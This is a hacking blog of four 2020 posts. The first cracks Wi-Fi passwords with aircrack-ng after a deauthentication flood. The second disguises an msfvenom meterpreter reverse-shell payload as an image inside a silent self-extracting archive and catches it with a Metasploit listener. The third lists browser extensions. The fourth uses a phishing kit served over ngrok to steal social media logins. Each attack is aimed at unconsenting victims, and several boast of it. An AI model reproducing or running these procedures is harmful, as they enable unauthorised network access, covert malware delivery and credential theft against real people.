Tuesday, 21 July 2020

HOW TO HACK WI-FI PASSWORD - A STEP BY STEP GUIDE

HOW TO HACK WI-FI



Hello Hackers , Today we will show you how you can easily hack wi-fi password within a couple of minutes . So without wasting any more time let's start . 

REQUIREMENTS :

1. Wi-Fi Adapter ( I have used Leoxsys Wi-Fi adapter ). You can purchase it from Amazon and Flipkart--LINK BELOW--

2. Kali Linux

3. Internet Connection

PROCEDURE :

1. Plug-in your Wi-Fi adapter.

2. Open terminal in Kali Linux and type iwconfig and press ENTER . You will see that you adapter properties will be shown with wlan0 interface .


3. To avoid issue and problem you need to write one command which will kill all the other process which might create problem . Type airmon-ng check kill


4. As you can see the Wi-Fi adapter is on Managed mode , So you need to first convert the Wi-Fi adapter from Managed mode to Monitor mode , To do this type airmon-ng start wlan0



5. After converting to Monitor mode the interface name will change from wlan0 to wlan0mon.

6. Now you need to scan the network using your Wi-Fi adapter . To scan the network type airdump-ng wlan0mon


NOTE : SELECT ONLY THAT TARGET WHICH COMES IN BOTH THE PANES AS SHOWN IN THE GIVEN BELOW FIGURE :


7. Now we will try to do Handshake and try to capture the packets. Its a 4 way Handshake.
To capture the packets type airodump-ng --bssid <BSSID OF THE DEVICE> -c <CHANNEL NAME> -w <FILE PATH> wlan0mon. Your packets will start collecting in a file.

8. To make the handshake faster , type aireplay-ng -0 0 -a <BSSID> wlan0mon . This command will send deauthentication packets to the others device which are connected to the Wi-Fi means it will desconnect all the devices connected to that Wi-Fi and then try to re-establish the connect. 

9. Now you have to just wait for the handshake.

After the handshake is established , Your work is complete.

10. The file in which the packets are stored , using that file we will crack the password of that Wi-Fi . To crack the password type aircrack-ng -w <WORDLIST PATH> <FILE PATH>.
NOTE : USE .cap FILE AS THE FILE PATH.


NOW JUST SIT AND WATCH , WORDLIST WILL CRACK THE PASSWORD AS SHOWN BELOW :

In the above picture you can see that password has been cracked. Now enjoy the Wi-Fi.

IF YOU LIKE THIS PLEASE LIKE , SHARE AND COMMENT . SUBSCRIBE TO OUR YOUTUBE CHANNEL AND FOLLOW US ON SOCIAL MEDIA NETWORK . <YOU CAN FIND THIS ALL IN THE ABOUT SECTION OF THE YOUTUBE CHANNEL. 
           ---------------------------------------LINK  BELOW -------------------------------------------------


THANK YOU...........................................

Thursday, 14 May 2020

HOW TO EMBED OR BIND PAYLOAD WITH AN IMAGE FILE TO GAIN ROOT ACCESS

HOW TO EMBED OR BIND PAYLOAD WITH AN IMAGE FILE TO GAIN ROOT ACCESS

 

SO HELLO GUYS ,
TODAY I GONNA SHOW YOU HOW YOU CAN EMBED AND BIND PAYLOAD WITH AN IMAGE FILE AND HOW YOU CAN GET THE ROOT ACCESS AFTER EXECUTING THE PAYLOAD OR IMAGE . YA I KNOW THAT YOU HAVE A QUESTION IN YOUR MIND THAT AN IMAGE CANNOT BE EXECUTED. SO READ THE FULL ARTICLE OR WATCH THE VIDEO LINK ABOVE.

TOOLS WHICH I USED :

1. KALI 2020.1 ( FOR MAKING THE PAYLOAD )

2. IMAGE FILE

3. QUICK ANY2ICO ( TO CONVERT IMAGE FILE INTO AN ICON )

4. WINRAR ( USE TO BIND THE PAYLOAD WITH IMAGE FILE )

PROCEDURE :

1. OPEN KALI AND MAKE A PAYLOAD ( TO MAKE A PAYLOAD OPEN THE 

TERMINAL AND TYPE msfvenom -p windows/meterpreter/reverse_tcp lport=4444 

lhost=<YOUR IP> -e x86/shikata_ga_nai -f exe </root/Desktop/payload.exe ) AND 

DOWNLOAD THAT FILE ON THE WINDOWS MACHINE BY STARTING THE PYTHON 

SERVER ( TO START THE PYTHON SERVER WRITE THE COMMAND IN THE 

TERMINAL python -m SimpleHTTPServer 8080 ). AFTER RUNNING THE SERVER GO 

TO YOUR WINDOW MACHINE , OPEN THE BROWSER AND TYPE 

www.<YOUR IP>:8080 AND DOWNLOAD YOUR PAYLOAD FILE .

2.  NOW WE WILL MAKE AN ICON WITH IMAGE . TO MAKE AN ICON RUN QUICK 

ANY2ICO AS ADMINISTRATOR SELECT THE IMAGE FILE AND SELECT THE 

DESTINATION FILE WHERE YOU WANT TO SAVE THAT ICON.


3.  AFTER THE ICON HAS CREATED NOW LETS BIND OUR PAYLOAD , TO BIND THE 

PAYLOAD FOLLOW THE STEPS :

          -------- SELECT BOTH THE IMAGE FILE AND PAYLOAD FILE AND RIGHT CLICK                        ON IT AND SELECT ADD TO ARCHIVE .

          ---------NOW YOU WILL SEE A WINDOW IS POP UP AND SELECT THE
                      FOLLOWING OPTION 
                 A : COMPRESSION METHOD = BEST
                 
                 B : ARCHIVE FORMAT =ZIP
                 
                 C : ARCHIVING OPTION = CREATE SFX ARCHIVE
                 
                 D : CLICK ON ADVANCE OPTION FROM THE TOP MENU
             
                 E : CLICK ON SETUP AND YOU WILL SEE RUN AFTER EXTRACTION
                       COLUMN [ IN THAT WRITE BOTH THE PAYLOAD AS WELL AS THE
                       IMAGE FILE NAME WITH THEIR FORMAT SUCH AS .EXE AND .JPG.
                  
                 F :  NOW GO TO THE UPDATE OPTION AND YOU WILL SEE A OVERWRITE 
                        MODE FROM THERE AND SELECT SKIP EXISTING FILES 

                G : NOW GO TO TEXT AND ICON OPTIONS YOU WILL SEE A LOAD SFX
                       ICON OPTION THERE NOW CLICK ON BROWSE AND SELECT YOUR  
                       ICON FILE

                H : NOW GO TO MODE OPTION AND YOU WILL SEE A SILENT MODE MENU
                     AND FROM THERE SELECT HIDE ALL OPTION 

                I : NOW CLICK ON OK AND AGAIN CLICK ON OK.
  
       --------- ALL THE WORK HAS BEEN DONE JUST START THE LISTENING ON THE   
                    KALI MACHINE AND RUN THE ZIP FILE ( TO START THE LISTENING
                    TYPE THE FOLLOWING COMMANDS: )

                 J : OPEN THE TERMINAL AND TYPE THE FOLLOWING COMMANDS :       

                           1. msfconsole

                           2. use exploit/multi handler

                           3. set payload windows/meterpreter/reverse_tcp

                           4. set lport 4444 
                      
                           5. set lhost <YOUR IP>
        
                           6. exploit
                                                                                                                                     

                 H : ALL STEPS ARE DONE NOW JUST OPEN THE IMAGE AND YOU WILL
                       SEE THAT THE SESSION HAS COME AND YOU HAVE ALL THE ACCESS
                       OF THE FILES


 SO IN THIS WAY GUYS YOU CAN BIND YOUR PAYLOAD WITH ANY IMAGE FILE 

AND THE VICTIM WILL NEVER BE ABLE TO GET THAT THIS IS MALWARE. I HOPE 

GUYS YOU LIKE THIS PLEASE COMMENT AND SHARE AND FOR TUTORIAL 

VIDEOS SUBSCRIBE TO OUR YOUTUBE CHANNEL . LINK BELOW :


               
              

Thursday, 30 April 2020

TOP 5 BROWSER EXTENSION USED BY THE HACKERS

TOP 5 BROWSER EXTENSION USED BY THE HACKERS

 

HELLO GUYS TODAY TODAY I GONNA TELL YOU SOME TOP 5 BROWSER EXTENSION USED BY THE HACKERS  , AND THEIR IS A REWARD WAITING FOR YOU AT THE END OF THE BLOG  , SO LETS START

TOPICS TO DISCUSS :

 1 . WHAT ARE BROWSER EXTENSIONS ?

2. HOW TO ADD AN EXTENSION TO A BROWSER   .

3. TOP 5 BROWSER EXTENSION USED BY THE HACKERS .

4. GIVING AWAY THE REWARD .

------------------------------------------------------------------------------------------------------------------------------
  

WHAT ARE BROWSER EXTENSION ?

BROWSER EXTENSION IS BASICALLY A SMALL SOFTWARE FOR CUSTOMIZING THE WEB BROWSER . BROWSER TYPICALLY ALLOWS A VARIETY OF EXTENSIONS, INCLUDING USER INTERFACE MODIFICATION  , AD BLOCKING AND COOKIES MANAGEMENT

---------------------------------------------------------------------------------------------------------------------------

HOW TO ADD AN EXTENSION TO A BROWSER .

 TO ADD AN EXTENSION TO THE BROWSER YOU CAN USE A SHORT CUT KEY i.e. CTRL+SHIFT+A OR YOU CAN CLICK ON THE MENU BUTTON ON THE TOP RIGHT SIDE OF THE BROWSER AND CLICK ON ADD ON OPTIONS , YOU WILL SEE A SEARCH BAR ON THE RIGHT SIDE OF THE PAGE SEARCH THE EXTENSION FOR EXAMPLE : VPN ( VIRTUAL PRIVATE NETWORK ) CLICK ON ANY OF THE VPN SHOWN IN THE RESULT , AFTER CLICKING YOU SEE A OPTION ADD TO BROWSER , THEN A POP WILL COME ON THE TOP ,  YOU JUST HAVE TO CLICK ON ADD AN D YOUR RXTENSION WILL BE ADDED TO THE CHROME.

---------------------------------------------------------------------------------------------------------------------------

TOP 5 BROWSER EXTENSION USED BY THE HACKERS

SO GUYS NOW I TELL YOU THE TOP 5 EXTENSIONS USED BY THE HACKERS  , SO LET'S START FROM THE START : 

5. WAYBACK MACHINE


 THIS EXTENSION IS USED TO SEE HOW A WEBSITE LOOK LIKE 3-4 YEARS BACK OR MANY , WHICH HELP A HACKER TO SEE THE RECENT VERSION OF THE WEBSITE , OR IT DETECT DEAD PAGES , DNS FAILURE ( 404 PAGE NOT FOUND ) .

4. HACKBAR QUANTUM

  
THIS EXTENSION IS USED TO DO ENCODING OR FOR ENCRYPTION . IT IS USED TO INSERT PAYLOAD WITHOUT USING THE BURPSUITE ( BURPSUITE IS A TOOL WHICH IS USED TO INTERPRET THE PATH OR IN LAYMAN LANGUAGE  WE CAN SAY THAT IT IS USED TO CAPTURE THE PATH OF THE DOMAIN SO THAT WE CAN MAKE CHANGES IN THE CODE OF THE SITE ).

3. FOXYPROXY




THIS EXTENSION IS USED TO CHANGE THE PROXY SETTING . WHILE DURING CONFIGURING THE PROXY SETTING WITH APP , PROBLEM MAY BE OCCURS WHILE SURFING THE WEBSITE SO THIS EXTENSION IS USED TO SET THE PROXY WITHOUT CHANGING SETTING FROM THE BROWSER .

2. NETCRAFT EXTENSION


THIS EXTENSION IS USED TO CHECK THAT HOW MUCH THE SITE IS SECURED OR IS THERE ANY VULNERABILITY  OR NOT , IT ALSO PROVIDE PROTECTION FROM THE PHISHING ATTACKS , MALWARES AND THE NEW CORONA VIRUS CYBER CRIME.

1. WAPPALYZER 

 THIS EXTENSION IS THE MOST IMPORTANT AND  IS USED TO CHECK IN WHICH LANGUAGE THE WEBSITE IS MADE FOR EXAMPLE PHP , JAVA , HTML , PYTHON ETC . IT ALSO TELL THE VERSION OF THE HTTP/HTTPS ( HTTP v1.0 IS AFFECTED FROM A VULNERABILITY i.e. HOST HEADER ATTACK . IT ALSO DETECTS THE WEB SERVERS , JAVASCRIPT FRAMEWORK , eCOMMERCE PLATFORM AND ANALYTICS TOOLS AND MANY MORE . 

---------------------------------------------------------------------------------------------------------------------------

NOW GUYS GET READY FOR YOUR REWARD

OUR TEAM HAS DECIDED TO GIVEAWAY THE NETFLIX  FOR FREE . TO GET THIS FREE GO TO OUR YOUTUBE CHANNEL SEE OUR LATEST VIDEO , CHECK THE DESCRIPTION , SEE THE TERMS AND CONDITION TO GET THIS FOR FREE .
 ------------------------------------------------------------------------------------------------------------------------

IF YOU LIKE THE CONTENT PLEASE COMMENT BELOW AND SUBSCRIBE OUR YOUTUBE CHANNEL , LIKE ALL THE VIDEOS AND DON'T FORGET TO COMMENT AS WELL.


THANK YOU.
 

Sunday, 26 April 2020

HOW TO HACK ALL SOCIAL MEDIA ACCOUNT AND BYPASS THE VERIFICATION OTP

HOW TO HACK ALL THE SOCIAL MEDIA ACCOUNT AND   BYPASS THE OTP 

 

ANNOUNCEMENT : HI GUYS , I CAN'T ABLE TO SHARE THE LINK OF THE VIDEO AS THE VIDEO HAS BEEN REMOVED BY THE YOUTUBE . I DON'T KNOW WHY THEY DO THIS , ACCORDING TO THEM I HAVE VIOLATES THE COMMUNITY GUIDELINES BUT ACCORDING TO ME THERE IS NO PROBLEM IN SHARING THE KNOWLEDGE. SO DO ALL THE STEPS GIVEN BELOW , IF ANY STEP DON'T WORK PLEASE COMMENT ME DOWN , PROBLEM WILL BE SOLVED ASAP. KINDLY SUPPORT............ 

 

WELCOME TO MY BLOG GUYS TODAY WE GONNA HACK THE SOCIAL MEDIA ACCOUNT WITH THE KALI AND WE WILL BYPASS THEIR OTP ( ONE TIME PASSWORD ) WHICH COMES FOR VERIFICATION OF THE USER  ( THIS IS ONLY APPLICABLE IF THE USER HAS DONE THE 2 STEP VERIFICATION ) OTHERWISE WE WILL DIRECTLY LOGIN INTO THEIR ACCOUNT WITHOUT ANY DIFFICULTY .

SO LETS START :
STEP : 1  SEARCHING AND COPYING THE DOWNLOADING LINK

LOGIN INTO YOUR KALI MACHINE , OPEN THE BROWSER SEARCH FOR AdvPhishing 

github OR CLICK ON THE GIVEN LINK https://github.com/Ignitetch/AdvPhishing 

CLICK ON CLONE OR DOWNLOAD OPTION TO COPY THE DOWNLOADING OR 

CLONING OR COPY FROM HERE LINK  : https://github.com/Ignitetch/AdvPhishing.git



STEP : 2 CLONING & INSTALLING THE TOOL

TO INSTALL THE TOOL OPEN THE TERMINAL  AND WRITE THE FOLLOWING COMMANDS :

cd Desktop

git clone https://github.com/Ignitetch/AdvPhishing.git  AND PRESS ENTER IT WILL TAKE SOME TIME AND IT WILL BE CLONED .


AFTER CLONING THE TOOL EXECUTE THE FOLLOWING COMMANDS TO 

cd AdvPhishing

chmod +x * 

HERE 

chmod  : IS USED TO GIVE THE PERMISSION

+x       : REPRESENTS THAT WE HAVE GIVE THE USER TO USE THIS FILE

*       : REPRESENTS THAT ALL ITEMS IN THAT FOLDER




NOW RUN THE SETUP BY USING ./setup.sh
AFTER RUNNING ./setup.sh SETUP WILL START DOWNLOAD AND INSTALLING NGROK AUTOMATICALLY (AS SHOWN BELOW)

 AFTER INSTALLING IT ASK FOR NGROK AUTHENTICATION TOKEN , SO TO GET THE TOKEN GO TO THE NGROK SITE AND SIGN UP OR USE THIS LINK https://dashboard.ngrok.com/login

AFTER SIGNING UP SCROLL DOWN AND SEE THE 2nd OPTION i.e. CONNECT YOUR ACCOUNT , UNDET THIS THERE IS A COMMAND GIVEN WHICH IS THE AUTHENTICATION TOKEN ( AS SHIWN BELOW )  , COPY THAT AND PASTE IT INTO THE TERMINAL AND PRESS ENTER .




NOW THE REAL GAME BEGINS

 STEP : 3 RUNNING THE TOOL AND RETERIVING THE ID AND PASSWORD

NOW WRITE THE FOLLOWING COMMANDS TO RUN THE TOOL 

ls

./An-AdvPhishing.sh 

PRESS y AND CLICK ENTER

NOW YOU WILL SEE A LIST , SELECT ANYONE OPTION OUT OF THE LIST
FOR EXAMPLE I AM SELECTING 2 FOR FACEBOOK HACKING , SO I WRITE 2 AND PRESS ENTER .


THEN IT WILL GIVE YOU A LINK ( AS SHOWN BELOW )



SEND THIS LINK TO ANYBODY  , WHEN THE VICTIM OPEN THIS LINK HE SAW A FAKE FACEBOOK PAGE  ( AS SHOWN BELOW )  , IF HE HAS 2 STEP VERIFICATION THEN THE OTP WILL SEND TO HIS EMAIL ( NOW IF THE VICTIM RECIEVE THE OTP OR NOT WE WILL GET THE ID AND PASSWORD)( AS SHOWN BELOW )



 SO GUYS YOU HAVE SEEN THAT WE HAVE RETERIVE THE ID AND PASSWORD OF THE VICTIMS ACCOUNT.

NOTE  : GUYS I HAVE TRIED ON FACEBOOK BUT THE STEPS WILL REMAIN SAME FOR ALL THE OPTIONS.

GUYS IF YOU LIKE MY BLOG PLEASE SHARE AND COMMENT AND PLEASE SUBSCRIBE TO MY YOUTUBE CHANNEL. LINK BELOW 


THANK YOU.